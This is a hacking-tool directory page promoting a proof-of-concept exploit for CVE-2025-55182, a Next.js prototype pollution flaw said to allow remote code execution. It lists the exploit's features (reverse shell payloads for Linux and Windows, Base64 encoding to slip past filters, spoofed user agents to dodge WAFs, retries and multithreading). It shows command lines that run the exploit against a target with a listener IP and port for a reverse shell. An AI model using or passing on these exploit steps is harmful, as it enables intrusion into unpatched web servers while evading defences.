Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182 — Poc for CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/0xn7y/cve-2025-55182
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

Poc for CVE-2025-55182

View Repository
9 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182 Next.js Prototype Pollution

CVE-2025-55182 is a critical prototype pollution vulnerability in nextjs that allows rce via improper input sanitization in the framework's request handling mechanism, this whole thing happens because nextjs is out here trusting JSON objects like a clueless rookie

POC

root@kitploit:~
1) Prototype Pollution in Request Parsing nextjs improperly sanitizes objects that can pollute the prototype chain

2) Insecure Deserialization  the framework allows JSON objects to modify base object prototypes

3) rce via child_process by polluting the prototype chain, once the prototype is polluted, we can hijack logic and make the server run stuff

SetUp

root@kitploit:~
npm create [email protected] vuln

Exp Core Capabilities

root@kitploit:~
1) Reverse Shell Payloads: Linux/Win  rev shells
2) Base64 encoding to sneak past filters
3) Auto OS detection
4) Random user agents to dodge WAFs
5) Retry loops incase of failer to retry attempts with exponential backoff
6) Multi-threading for concurrent exploit attempts for reliability

With Base64 encoding (evasion)

root@kitploit:~
python exp_v2.py target 192.168.1.69 9001 --base64

Aggressive mode with retries

root@kitploit:~
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

Disable randome user agent

root@kitploit:~
python exploit.py target.com 192.168.1.69 9001 --no-spoof
Download Tool